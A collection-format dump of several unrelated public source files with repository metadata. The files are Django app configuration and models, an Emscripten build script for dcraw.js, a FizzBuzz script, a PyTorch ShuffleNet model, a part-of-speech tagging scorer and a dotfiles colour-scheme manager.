subprocess.run(["flake8", "project"])
if __name__ == "__main__":
cli()
| [
"scott@skiplist.com"
] | scott@skiplist.com |
2cac3d08334c146dd3333f471c8ee1fa6546c71d | bc9c1a4da0d5bbf8d4721ee7ca5163f488e88a57 | /research/urls.py | fe0aeb667e57278015b49196ad14403f92bec46d | [] | no_license | mit-teaching-systems-lab/newelk | 77f43666f3c70be4c31fdfc6d4a6e9c629c71656 | a2e6665bfcf9e2ea12fde45319027ee4a848f93c | refs/heads/master | 2022-12-13T20:50:17.632513 | 2019-10-03T19:02:01 | 2019-10-03T19:02:01 | 132,154,880 | 0 | 4 | null | 2022-12-08T01:26:56 | 2018-05-04T15:04:20 | Python | UTF-8 | Python | false | false | 222 | py | from django.urls import path
from . import views
urlpatterns = [
# path('chatlogs/', views.streaming_chat_csv),
# path('answerlogs/', views.streaming_answers_view),
path("feedback/", views.toggle_feedback)
]
| [
"bhanks@mit.edu"
] | bhanks@mit.edu |
3ca6956b11786854ba5ed8849b17496003024f52 | a82ef0fc466216c89878888346226ab5adac1349 | /make.py | 9312eda3205ca5aa7f1205c63119b1ebf3c3391a | [] | no_license | tchau4485/rawson.js | 885c6be0931b352f6e7b73ce54a295fbc5ed417f | f9de04f0cd28f8dcc1aad5cf8fbc3b369ec79fed | refs/heads/master | 2021-01-16T20:31:17.528303 | 2013-03-10T21:51:47 | 2013-03-10T21:51:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,849 | py | #!/usr/bin/python
import os, sys, re, json, shutil
from subprocess import Popen, PIPE, STDOUT
exec(open(os.path.expanduser('~/.emscripten'), 'r').read())
sys.path.append(EMSCRIPTEN_ROOT)
import tools.shared as emscripten
# Config
emscripten.Settings.USE_TYPED_ARRAYS = 2
emscripten.Settings.CORRECT_OVERFLOWS = 0
emscripten.Settings.CORRECT_ROUNDINGS = 0
emscripten.Settings.CORRECT_SIGNS = 1
emscripten.Settings.OPTIMIZE = 2
emscripten.Settings.RELOOP = 1
emscripten.Settings.INIT_STACK = 0
emscripten.Settings.INVOKE_RUN = 0
emscripten.Settings.ASM_JS = 1
emscripten.Building.COMPILER_TEST_OPTS = ['-g']
# Build
print 'Build dcraw.js'
output = Popen([emscripten.EMCC, '-O2', '-s', 'ALLOW_MEMORY_GROWTH=1','-s', 'ASM_JS=1', '-g','-lm', '-o', 'build/dcraw.js','-DNODEPS','dcraw/dcraw.c'], stdout=PIPE, stderr=STDOUT).communicate()[0]
assert os.path.exists('build/dcraw.js'), 'Failed to build dcraw: ' + output
# re-introduced timezone bug in emscripten lib -
# date.toString() doesn't contain timezone in Windows *urgh*
bad_timezone_js = [
'winter.toString().match(/\(([A-Z]+)\)/)[1]',
'summer.toString().match(/\(([A-Z]+)\)/)[1]',
'date.toString().match(/\(([A-Z]+)\)/)[1]'
]
prepend_js = """
(function() {
var root;
root = (typeof exports !== "undefined" && exports !== null) ? exports : this;
"""
append_js = """
root.run = run;
root.FS = FS;
}());
"""
f = open('build/dcraw.js', 'r')
contents = f.read()
# hard-code timezones to UTC
for snippet in bad_timezone_js:
contents = contents.replace(snippet, '"UTC"');
f.close()
f = open('build/dcraw.js', 'w')
f.writelines([prepend_js,contents, append_js])
f.close()
Popen(['java', '-jar', emscripten.CLOSURE_COMPILER,
'--js', 'build/dcraw.js', '--js_output_file', 'build/dcraw.min.js'], stdout=PIPE, stderr=STDOUT).communicate()
| [
"fbuchinger@fbuchinger-ThinkPad-Edge.(none)"
] | fbuchinger@fbuchinger-ThinkPad-Edge.(none) |
07ca45b0d4fc80cdbfe1ba1c70137645fd5053db | 8a99fd853c98cb78174c1400fed6a00487c2d4e7 | /FizzBuzz.py | e2d5d81c30e904185abd0b92daa7c9572afe0bb9 | [] | no_license | ajkmonster/fizzbuzzpyth | a6b4cd5f022540e36711f19fd65f1b20bb61e32f | 4601cf801fe14c252b02eb7ccd680990f52cfe26 | refs/heads/master | 2020-05-06T15:19:01.602174 | 2019-04-08T15:56:19 | 2019-04-08T15:56:19 | 180,183,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | for x in range(1,100,1):
if x%5==0 & x%3==0:
print ('Fizzbuzz')
elif x%5==0:
print('Buzz')
elif x%3==0:
print('Fizz')
else:
print(x)
| [
"noreply@github.com"
] | noreply@github.com |
82b23cb422076185141456f57956768bf267521b | cc746a21c8c7f234c1ce71c5ac1ca67ff5f98469 | /students/yevhen_alexandr/imaginarium/game/models.py | a3fe801e09e911f68464553c7c5f1b87cf58e3b4 | [] | no_license | zdimon/wezom-python-course2 | 0dad698bcfc46b0959242f95df5c4ecdd1a441ba | d4f805849d02e7516c6806fa475d49ac4869240c | refs/heads/master | 2023-06-16T16:59:57.161205 | 2021-01-27T16:18:04 | 2021-01-27T16:18:04 | 322,817,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 612 | py | from django.db import models
from django.utils.safestring import mark_safe
class Page(models.Model):
title = models.CharField(max_length=250)
content = models.TextField()
class Image(models.Model):
title = models.CharField(max_length=250, null=True, blank=True)
image = models.ImageField(upload_to='images')
@property
def image_tag(self):
return mark_safe(f'<img height="50" src="{self.image.url}" />')
class Contact(models.Model):
name = models.CharField(max_length=255)
email = models.EmailField(max_length=255)
message = models.CharField(max_length=255)
| [
"George_V@ua.fm"
] | George_V@ua.fm |
390ee336f83088e3f9b8609b7c854dfa3f4ea232 | 2e5e990955957cf04367ef6eedd62e6add7ccdc7 | /oms_cms/backend/api/v2/social_networks/serializers.py | 24a77bc22571a871c6dfb51890fd85f061a40858 | [
"BSD-3-Clause"
] | permissive | RomanYarovoi/oms_cms | 3dfcd19ff03b351dc754f73f4a0d8a9986cf28ec | 49c6789242d7a35e81f4f208c04b18fb79249be7 | refs/heads/master | 2021-07-06T18:49:51.021820 | 2020-10-15T05:52:55 | 2020-10-15T05:52:55 | 196,556,814 | 0 | 0 | BSD-3-Clause | 2020-10-15T05:52:57 | 2019-07-12T10:07:29 | JavaScript | UTF-8 | Python | false | false | 312 | py | from rest_framework import serializers
from oms_cms.backend.social_networks.models import SocialNetworks
class SocialNetworksSerializer(serializers.ModelSerializer):
"""Сериализация социальных сетей"""
class Meta:
model = SocialNetworks
fields = '__all__'
| [
"arsavit@gmail.com"
] | arsavit@gmail.com |
e3d72c1481cbc8561eafdf733425c7c3c0d61ef5 | ac8eb14f45dcdf3dba02cbb42fb848026f35e6a9 | /server/catalog/admin.py | 0fd6c91178354e6a59ca0d0f0b639eb0fb388517 | [] | no_license | kostisbourlas/pysearch | 0d9a68dd94f28fea5600d46e97ef7792c5ab9e08 | 391da36a27b58e9797bf9b7207d946b111bb520c | refs/heads/main | 2023-07-13T13:02:44.597945 | 2021-08-12T16:50:09 | 2021-08-12T16:50:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | from django.contrib import admin
from .models import Wine
@admin.register(Wine)
class WineAdmin(admin.ModelAdmin):
fields = (
'id', 'country', 'description', 'points', 'price', 'variety', 'winery'
)
list_display = ('id', 'country', 'points', 'price', 'variety', 'winery',)
list_filter = ('country', 'variety', 'winery',)
ordering = ('variety',)
readonly_fields = ('id',)
| [
"kostisbourlas@protonmail.com"
] | kostisbourlas@protonmail.com |
7a61f5f44034c653d32cd5858fe9f6521bc38446 | 7936f2011261efa2d31b2b1f2a16eee9ba29a0cd | /article_scraper/article_scraper/spiders/wikipedia.py | 83b012fa6a501e0700101fa4707d4e29b04b746c | [] | no_license | gregorybohn620/RCATScrape | 746386ce671a67e5d53b9f05d45b987410409cee | 5bb0e4734712d6d05eb6c704e3493337fd56b685 | refs/heads/master | 2023-06-29T18:51:22.127161 | 2021-08-02T22:43:31 | 2021-08-02T22:43:31 | 392,110,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 821 | py | import scrapy
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from article_scraper.items import Article
class WikipediaSpider(CrawlSpider):
name = 'wikipedia'
allowed_domains = ['en.wikipedia.org']
start_urls = ['http://en.wikipedia.org/wiki/Kevin_Bacon']
rules = [Rule(LinkExtractor(allow=r'wiki/((?!:).)*$'), callback='parse_info', follow=True)]
def parse_info(self, response):
article = Article()
article["title"]= response.xpath('//h1/text()').get() or response.xpath('//h1/i/text()').get()
article["url"]= response.url
article["lastUpdated"] = response.xpath('//li[@id="footer-info-lastmod"]/text()').get()
return article
# scrapy runspider wikipedia.py -o articles.csv -t csv -s CLOSESPIDER_PAGECOUNT=10
| [
"gregorybohn620@utexas.edu"
] | gregorybohn620@utexas.edu |
2d4358e6df492ace9ba536ec9894210f4f6dd9a5 | 3ee6ec4eca2a03a58ae1d7cd7aa547fb724cbb43 | /part1/pos_scorer.py | 5c0487e5628a66acf1ba19f53951491553d9d9c9 | [] | no_license | tanvi5/Optical-character-recognition-and-POS-tagger | 01dcd41ce9e122a38c11c74fc8785947d0440e4b | dd5b3431eed6fbf3bd9db5ba2f43061cd8263e8d | refs/heads/master | 2020-04-13T11:15:47.303325 | 2018-12-26T10:49:26 | 2018-12-26T10:49:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,794 | py | #!/usr/bin/env python3
###################################
# CS B551 Fall 2018, Assignment #3
#
# Scoring code by D. Crandall
#
class Score:
def __init__(self):
self.word_scorecard = {}
self.sentence_scorecard = {}
self.word_count = 0
self.sentence_count = 0
def score(self, algo_outputs, gt):
self.word_count += len(gt)
self.sentence_count += 1
for algo,labels in algo_outputs.items():
correct = 0
for j in range(0, len(gt)):
correct += 1 if gt[j] == labels[j] else 0
self.word_scorecard[algo] = self.word_scorecard.get(algo, 0) + correct
self.sentence_scorecard[algo] = self.sentence_scorecard.get(algo, 0) + (correct == len(gt))
def print_scores(self):
print("\n==> So far scored %d sentences with %d words." % (self.sentence_count, self.word_count))
print(" Words correct: Sentences correct: ")
for i in sorted(self.word_scorecard):
print("%18s: %7.2f%% %7.2f%%" % (i, self.word_scorecard[i]*100 / float(self.word_count), self.sentence_scorecard[i]*100 / float(self.sentence_count)))
@staticmethod
def print_helper(description, list, sentence):
print (("%40s" % description) + " " + " ".join([(("%-" + str(max(4,len(sentence[i]))) + "s") % list[i]) for i in range(0,len(list)) ] ) )
@staticmethod
def print_results(sentence, outputs, posteriors, models):
Score.print_helper(" ".join([("%7s" % model) for model in models]), sentence, sentence)
for algo in sorted(outputs.keys()):
Score.print_helper(algo + " "+" ".join(["%7.2f" % posteriors[algo][model] for model in models]), outputs[algo], sentence)
| [
"noreply@github.com"
] | noreply@github.com |
48fb9be7fe206dd8b786ee8826e31648fa25db09 | 439e07d2fa9c016631e40d3fb191558066434245 | /search/exp.py | ae488175c73b0df4df2b4e4f93f73f386f8be945 | [] | no_license | AkashTalware/search_trailers | 72ddc242b4bb065377d48f5a88965d175737e148 | 602affc732340fb61fb9f70fe4c02dcf20702333 | refs/heads/master | 2023-04-26T02:37:27.653382 | 2021-04-07T10:51:31 | 2021-04-07T10:51:31 | 354,066,894 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | from pytube import YouTube
obj = YouTube("https://www.youtube.com/watch?v=ZrdQSAX2kyw")
strs = obj.streams.get_by_resolution(resolution="720p")
print(strs.mime_type)
# strm_all = obj.streams.filter(mime_type="video/mp4")
# l = {}
# l = {video for video in strm_all if video.resolution not in l.fromkeys("resolution")}
# for li in l:
# print(li)
# print(l) | [
"DK0031@digikull.com"
] | DK0031@digikull.com |
9589b6d1134195f2758af446807ba14035c231bb | e1878d2072e0aac22d1b9b1bac7a06b8b7af3eed | /models/shufflenet.py | 0a600b69d000a34744141fda16041929f3fe031e | [] | no_license | njuhuxw/B.2-image-classification-master | db747296cea8ae178349017d37b0d5280457202e | 6f10c2db7ec13e2f1b00c8f0b67e25e964fde862 | refs/heads/master | 2023-01-19T02:58:12.351546 | 2020-11-30T09:51:10 | 2020-11-30T09:51:10 | 311,579,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,438 | py | """shufflenet in pytorch
[1] Xiangyu Zhang, Xinyu Zhou, Mengxiao Lin, Jian Sun.
ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices
https://arxiv.org/abs/1707.01083v2
"""
from functools import partial
import torch
import torch.nn as nn
class BasicConv2d(nn.Module):
def __init__(self, input_channels, output_channels, kernel_size, **kwargs):
super().__init__()
self.conv = nn.Conv2d(input_channels, output_channels, kernel_size, **kwargs)
self.bn = nn.BatchNorm2d(output_channels)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
class ChannelShuffle(nn.Module):
def __init__(self, groups):
super().__init__()
self.groups = groups
def forward(self, x):
batchsize, channels, height, width = x.data.size()
channels_per_group = int(channels / self.groups)
#"""suppose a convolutional layer with g groups whose output has
#g x n channels; we first reshape the output channel dimension
#into (g, n)"""
x = x.view(batchsize, self.groups, channels_per_group, height, width)
#"""transposing and then flattening it back as the input of next layer."""
x = x.transpose(1, 2).contiguous()
x = x.view(batchsize, -1, height, width)
return x
class DepthwiseConv2d(nn.Module):
def __init__(self, input_channels, output_channels, kernel_size, **kwargs):
super().__init__()
self.depthwise = nn.Sequential(
nn.Conv2d(input_channels, output_channels, kernel_size, **kwargs),
nn.BatchNorm2d(output_channels)
)
def forward(self, x):
return self.depthwise(x)
class PointwiseConv2d(nn.Module):
def __init__(self, input_channels, output_channels, **kwargs):
super().__init__()
self.pointwise = nn.Sequential(
nn.Conv2d(input_channels, output_channels, 1, **kwargs),
nn.BatchNorm2d(output_channels)
)
def forward(self, x):
return self.pointwise(x)
class ShuffleNetUnit(nn.Module):
def __init__(self, input_channels, output_channels, stage, stride, groups):
super().__init__()
#"""Similar to [9], we set the number of bottleneck channels to 1/4
#of the output channels for each ShuffleNet unit."""
self.bottlneck = nn.Sequential(
PointwiseConv2d(
input_channels,
int(output_channels / 4),
groups=groups
),
nn.ReLU(inplace=True)
)
#"""Note that for Stage 2, we do not apply group convolution on the first pointwise
#layer because the number of input channels is relatively small."""
if stage == 2:
self.bottlneck = nn.Sequential(
PointwiseConv2d(
input_channels,
int(output_channels / 4),
groups=groups
),
nn.ReLU(inplace=True)
)
self.channel_shuffle = ChannelShuffle(groups)
self.depthwise = DepthwiseConv2d(
int(output_channels / 4),
int(output_channels / 4),
3,
groups=int(output_channels / 4),
stride=stride,
padding=1
)
self.expand = PointwiseConv2d(
int(output_channels / 4),
output_channels,
groups=groups
)
self.relu = nn.ReLU(inplace=True)
self.fusion = self._add
self.shortcut = nn.Sequential()
#"""As for the case where ShuffleNet is applied with stride,
#we simply make two modifications (see Fig 2 (c)):
#(i) add a 3 × 3 average pooling on the shortcut path;
#(ii) replace the element-wise addition with channel concatenation,
#which makes it easy to enlarge channel dimension with little extra
#computation cost.
if stride != 1 or input_channels != output_channels:
self.shortcut = nn.AvgPool2d(3, stride=2, padding=1)
self.expand = PointwiseConv2d(
int(output_channels / 4),
output_channels - input_channels,
groups=groups
)
self.fusion = self._cat
def _add(self, x, y):
return torch.add(x, y)
def _cat(self, x, y):
return torch.cat([x, y], dim=1)
def forward(self, x):
shortcut = self.shortcut(x)
shuffled = self.bottlneck(x)
shuffled = self.channel_shuffle(shuffled)
shuffled = self.depthwise(shuffled)
shuffled = self.expand(shuffled)
output = self.fusion(shortcut, shuffled)
output = self.relu(output)
return output
class ShuffleNet(nn.Module):
def __init__(self, num_blocks, num_classes=10, groups=3):
super().__init__()
if groups == 1:
out_channels = [24, 144, 288, 567]
elif groups == 2:
out_channels = [24, 200, 400, 800]
elif groups == 3:
out_channels = [24, 240, 480, 960]
elif groups == 4:
out_channels = [24, 272, 544, 1088]
elif groups == 8:
out_channels = [24, 384, 768, 1536]
self.conv1 = BasicConv2d(3, out_channels[0], 3, padding=1, stride=1)
self.input_channels = out_channels[0]
self.stage2 = self._make_stage(
ShuffleNetUnit,
num_blocks[0],
out_channels[1],
stride=2,
stage=2,
groups=groups
)
self.stage3 = self._make_stage(
ShuffleNetUnit,
num_blocks[1],
out_channels[2],
stride=2,
stage=3,
groups=groups
)
self.stage4 = self._make_stage(
ShuffleNetUnit,
num_blocks[2],
out_channels[3],
stride=2,
stage=4,
groups=groups
)
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(out_channels[3], num_classes)
def forward(self, x):
x = self.conv1(x)
x = self.stage2(x)
x = self.stage3(x)
x = self.stage4(x)
x = self.avg(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
def _make_stage(self, block, num_blocks, output_channels, stride, stage, groups):
"""make shufflenet stage
Args:
block: block type, shuffle unit
out_channels: output depth channel number of this stage
num_blocks: how many blocks per stage
stride: the stride of the first block of this stage
stage: stage index
groups: group number of group convolution
Return:
return a shuffle net stage
"""
strides = [stride] + [1] * (num_blocks - 1)
stage = []
for stride in strides:
stage.append(
block(
self.input_channels,
output_channels,
stride=stride,
stage=stage,
groups=groups
)
)
self.input_channels = output_channels
return nn.Sequential(*stage)
def shufflenet():
return ShuffleNet([4, 8, 4])
| [
"852393503@qq.com"
] | 852393503@qq.com |
bd13e9dce56eb2014ae5589dc7d6718fb83209fa | cf32375a13c127b24277c115fe692fbd46c23edb | /gallery/gallery/settings.py | 268022e41fd1eb2c40ce7d720ae680ab13963b1e | [] | no_license | vivekmohbe/Gallery | 87cbd914d59b24d52de12555a27935540cb71616 | fc7199c9d2caa9e6f8a6cdefa2eef83c82c8caab | refs/heads/master | 2020-04-13T10:25:34.110275 | 2018-12-26T05:44:36 | 2018-12-26T05:44:36 | 163,138,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,754 | py | import os
#import posixpath
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '8ace3072-47a0-4910-b522-dc3601f38c35'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['0.0.0.0','127.0.0.1','localhost','gallery.velingeorgiev.pro']
INTERNAL_IPS = ('0.0.0.0','127.0.0.1','localhost',)
INSTALLED_APPS = [
'app',
'material',
'material.admin',
'imagekit',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sitemaps',
'django.contrib.sites'
]
SITE_ID = 1
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware'
]
ROOT_URLCONF = 'gallery.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages'
],
},
},
]
WSGI_APPLICATION = 'gallery.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LOGIN_REDIRECT_URL = '/admin/'
# Internationalization
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = False
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
STATIC_URL = '/static/'
# https://docs.djangoproject.com/en/1.8/howto/static-files/deployment/
# python manage.py collectstatic
#STATIC_ROOT = posixpath.join(*(BASE_DIR.split(os.path.sep) + ['static/']))
STATIC_ROOT = BASE_DIR + '/static/'
MEDIA_URL = '/media/'
#MEDIA_ROOT = posixpath.join(*(BASE_DIR.split(os.path.sep) + ['media/']))
MEDIA_ROOT = BASE_DIR + '/media/'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': BASE_DIR + '/debug.log',
},
},
'loggers': {
'django': {
'handlers': ['file'],
'level': 'DEBUG',
'propagate': True,
},
},
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
EMAIL_USE_TLS = True
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_PORT = 587
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder'
)
| [
"root.mohbe@gmail.com"
] | root.mohbe@gmail.com |
77c2ecaf8881dc69f7f28a6a102a52a772152728 | a2bb2cb991af985ec9444053e2c396d45dae5633 | /Tree questions/tree using inorder preorder.py | fabdefd5be990689fd3f67762c176b0561cddeb5 | [] | no_license | PauraviW/leetcode-problems | e8ad25ff3e565329065bc9907ebdcfbb81087865 | b309ec7304806c328b64ab47fa006b67c2e99307 | refs/heads/master | 2023-03-07T08:01:48.515155 | 2021-02-18T17:03:55 | 2021-02-18T17:03:55 | 265,299,036 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 929 | py | class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def constructTree(self, inorder, preorder):
if preorder and inorder:
root = TreeNode(preorder.pop(0))
left_array = inorder[0: inorder.index(root.val)]
right_array = inorder[inorder.index(root.val) +1:]
root.left = self.constructTree(left_array, preorder)
root.right = self.constructTree(right_array, preorder)
return root
else:
return None
preorder = [3,9,20,15,7]
inorder = [9,3,15,20,7]
root = Solution().constructTree(inorder, preorder)
vals = []
stack = [root]
while stack:
node = stack.pop(0)
vals.append(node.val)
if node.left:
stack.append(node.left)
if node.right:
stack.append(node.right)
print(vals)
| [
"pauravi.wagh12@gmail.com"
] | pauravi.wagh12@gmail.com |
35d70444c9801cd8678cf01c2f4f4dfb90bfa76a | 600aaed27fd7239db246e9ae1030f2fad8ee6015 | /.scripts/colour-manager.py | e9541c48947178353756ed1615725ce42cefc62f | [] | no_license | Hives/dotfiles-old | e89c97f53d454606db4e15b16e8b4916871dbf8c | 544d71c267a062db4778b85a9d46b38e975a05b2 | refs/heads/master | 2022-04-07T14:55:12.769628 | 2019-12-23T17:02:04 | 2019-12-23T17:02:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,595 | py | import os
import pprint
import subprocess
import sys
from pathlib import Path
from shutil import copyfile
# sys.argv is the list of arguments
# the first (zeroth) argument is always the name of the script
if len(sys.argv) > 1:
scheme = sys.argv[1]
else:
scheme = "dark-scheme"
home = str(Path.home()) + "/"
path = home + ".config/xcolors/"
schemefile = path + scheme
print ('scheme file: ' + schemefile)
def update_config ( path, name, output ):
"Replaces anything between the two markers in 'configfile' with 'output'"
config_file = path + name
tmp_file = path + name + "-tmp"
copying = True
colours_ended = False
with open(config_file) as old_file, open(tmp_file, "w") as new_file:
for line in old_file:
if not copying and "ʕっ•ᴥ•ʔっ COLOURS END" in line:
copying = True
colours_ended = True
if copying:
new_file.write(line)
if "ʕっ•ᴥ•ʔっ COLOURS START" in line:
new_file.write(output)
copying = False
# DANGER - COULD TRASH YOUR CONFIG HERE!!!!!!
# test if 'colours_ended' before copying file, cos if second marker not
# found then something has probably gone wrong
if colours_ended:
os.remove(config_file)
os.rename(tmp_file, config_file)
print(name + " updated")
else:
os.remove(tmp_file)
print("Couldn't find 'COLOURS END', did not modify " + name)
###############################################################################
## IMPORT COLOURS
###############################################################################
colours = {}
for line in open(schemefile):
line = ''.join(line.split()) # removes whitespace, space, tab etc.
if len(line) > 1 and line[0]=="*":
c = line.lower().split(':')
name = c[0].lstrip("*.").rstrip(":")
colours[name] = c[1]
foreground = colours["foreground"]
foreground_bright = colours["color14"]
highlight1 = colours["color5"]
highlight1_bright = colours["color13"]
highlight2 = colours["color4"]
highlight2_bright = colours["color12"]
background = colours["color8"]
background_bright = colours["color0"]
background_Vbright = colours["color10"]
urgent = colours["color1"]
urgent_bright = colours["color9"]
# standard colours
black = "#000000"
white = "#ffffff"
xmonadColours = {
"cText": foreground,
"cActive": highlight1,
"cBackground": background,
"cVisible": background_bright,
"cDeselected": background_bright,
"cVisibleWorkspaceText": foreground_bright,
"cVisibleWorkspaceBackground": background_bright,
"cUrgent": urgent,
"cActiveTabText": background_bright,
"cPrompt": background_bright,
"cPromptHighlight": highlight2,
"cHotPrompt": urgent,
"cHotPromptText": background
}
rofiColours = {
"normal-foreground": foreground,
"normal-background": background,
"normal-background-alternate": background_bright,
"normal-selected-foreground": background,
"normal-selected-background": highlight2,
"active-foreground": background,
"active-background": highlight1,
"active-background-alternate": highlight1_bright,
"urgent-foreground": background,
"urgent-background": urgent,
"urgent-background-alternate": urgent_bright,
"border-color": highlight2
}
dunstColours = {
"background": background,
"foreground": foreground,
"frame_low": highlight2,
"frame_normal": highlight2,
"frame_critical": urgent
}
dmenuColours = {
"dmenu_fg": background,
"dmenu_bg": highlight1,
"dmenu_select_fg": highlight1,
"dmenu_select_bg": background,
}
###############################################################################
## Dmenu
###############################################################################
# dmenu_output = '\n# %s\n\n' % schemefile
# for name, colour in dmenuColours.items():
# dmenu_output += '{name}="{colour}"\n'.format(name=name, colour=colour)
# dmenu_output += "\n"
# update_config( path = home + ".scripts/",
# name = "dmenu_pm",
# output = dmenu_output )
###############################################################################
## Dunst
###############################################################################
dunst_output = '\n# %s/\n' % schemefile
dunst_output += '# shame we had to include the timeouts in here :(\n\n'
for urgency_level in ["low", "normal", "critical"]:
timeout = "0" if urgency_level == "critical" else "10"
dunst_output += '[urgency_%s]\n' % urgency_level
dunst_output += ' frame_color = "%s"\n' % dunstColours["frame_" + urgency_level]
dunst_output += ' background = "%s"\n' % dunstColours["background"]
dunst_output += ' foreground = "%s"\n' % dunstColours["foreground"]
dunst_output += ' timeout = "%s"\n' % timeout
dunst_output += '\n'
update_config( path = home + ".config/dunst/",
name = "dunstrc",
output = dunst_output )
###############################################################################
## Rofi
###############################################################################
rofi_output = '\n/* %s */\n\n' % schemefile
for name, colour in rofiColours.items():
rofi_output += '{name}: {colour};\n'.format(name=name, colour=colour)
rofi_output += "\n"
update_config( path = home + ".config/rofi/",
name = "config.rasi",
output = rofi_output )
###############################################################################
## XMonad
###############################################################################
xmonad_output = '\n-- %s\n\n' % schemefile
for name, colour in xmonadColours.items():
xmonad_output += '{name} = "{colour}"\n'.format(name=name, colour=colour)
xmonad_output += "\n"
update_config( path = home + ".xmonad/",
name = "xmonad.hs",
output = xmonad_output )
###############################################################################
## XResources
###############################################################################
#copyfile(schemefile, path + 'xresources-current-scheme')
xresources_output = '#include "%s"\n' % schemefile
update_config( path = home,
name = ".Xresources",
output = xresources_output )
###############################################################################
## whats-playing
###############################################################################
whats_playing_output = 'colour=%s\n' % colours["color1"]
update_config( path = home + ".scripts/",
name = "whats-playing",
output = whats_playing_output )
subprocess.call(["chmod", "+x", home + ".scripts/whats-playing"])
###############################################################################
## Xmobar
###############################################################################
# this one is more complicated because the xmobar syntax is limited, and we
# can't just paste in a bunch of variable definitions.
# so instead we read through a template file and replace, for instance, "+red+"
# with the appropriate hex value.
path = home + ".xmonad/"
name = "xmobar.conf"
template_name = "xmobar-template.hs"
config_file = path + name
tmp_file = config_file + "-tmp"
template_file = path + template_name
xmobar_header_output = "--\n"
xmobar_header_output += "-- DO NOT EDIT THIS FILE DIRECTLY\n"
xmobar_header_output += "-- To make changes, edit %s\n" % template_file
xmobar_header_output += "-- then run colour-manager.py\n"
xmobar_header_output += "--\n"
copying = True
header_ended = False
with open(template_file) as old_file, open(tmp_file, "w") as new_file:
for line in old_file:
if not copying and "ʕっ•ᴥ•ʔっ HEADER END" in line:
copying = True
header_ended = True
if copying:
new_file.write(line)
if "ʕっ•ᴥ•ʔっ HEADER START" in line:
new_file.write(xmobar_header_output)
copying = False
# DANGER - COULD TRASH YOUR CONFIG HERE!!!!!!
# test if 'colours_ended' before copying file, should prove that the both
# markers were found
if header_ended:
with open(tmp_file, 'r') as new_file:
config_data = new_file.read()
config_data = config_data.replace('+black+', colours["color0"])
config_data = config_data.replace('+black_bright+', colours["color8"])
config_data = config_data.replace('+red+', colours["color1"])
config_data = config_data.replace('+red_bright+', colours["color1"])
config_data = config_data.replace('+green+', colours["color2"])
config_data = config_data.replace('+green_bright+', colours["color10"])
config_data = config_data.replace('+yellow+', colours["color3"])
config_data = config_data.replace('+yellow_bright+', colours["color11"])
config_data = config_data.replace('+blue+', colours["color4"])
config_data = config_data.replace('+blue_bright+', colours["color12"])
config_data = config_data.replace('+magenta+', colours["color5"])
config_data = config_data.replace('+magenta_bright+', colours["color13"])
config_data = config_data.replace('+cyan+', colours["color6"])
config_data = config_data.replace('+cyan_bright+', colours["color14"])
config_data = config_data.replace('+white+', colours["color7"])
config_data = config_data.replace('+white_bright+', colours["color15"])
# config_data = config_data.replace('+background+', black)
config_data = config_data.replace('+background+', colours["color8"])
config_data = config_data.replace('+foreground+', colours["foreground"])
with open(tmp_file, 'w') as new_file:
new_file.write(config_data)
os.remove(config_file)
os.rename(tmp_file, config_file)
print(name + " updated")
else:
os.remove(tmp_file)
print("Couldn't find 'HEADER END', did not modify " + name)
| [
